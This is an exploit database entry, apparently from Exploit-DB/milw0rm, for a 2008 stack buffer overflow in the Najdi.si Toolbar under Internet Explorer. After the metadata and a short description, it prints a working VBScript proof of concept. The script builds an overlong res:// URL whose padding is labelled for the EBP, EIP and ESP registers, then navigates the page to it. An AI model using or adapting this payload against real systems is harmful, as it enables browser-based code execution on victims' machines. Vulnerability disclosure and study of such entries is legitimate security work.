Najdi.si Toolbar Remote Buffer Overflow

vendor:

Toolbar

by:

shinnai

9.3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Toolbar

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP2, Windows XP Professional SP3, Windows 2k Professional SP4, Windows Server 2003 SP2

2008

Najdi.si Toolbar Remote Buffer Overflow

A remote buffer overflow vulnerability exists in the Najdi.si Toolbar. The vulnerability is caused due to a boundary error when handling overly long URLs. This can be exploited to cause a stack-based buffer overflow via a specially crafted URL passed to the vulnerable application. Successful exploitation may allow execution of arbitrary code.

Mitigation:

No known mitigation is available.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------------
 Najdi.si Toolbar Remote Buffer Overflow
 url: http://www.najdi.si/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on:
 Windows XP Professional SP2 with Internet Explorer 6 and 7
 Windows XP Professional SP3 with Internet Explorer 6 and 7
 Windows 2k Professional SP4 with Internet Explorer 6
 Windows Server 2003 SP2 with Internet Explorer 7
-----------------------------------------------------------------------------
<script language='vbscript'>

 mUrl = "res://" + String(260, "a") + "bb" + "cc" + String(512, "d") + "/"
 
 ' "bb" 	=> see EBP
 ' "cc" 	=> see EIP
 ' "ddd..."	=> see ESP

 Document.Location = mUrl

</script>

# milw0rm.com [2008-08-29]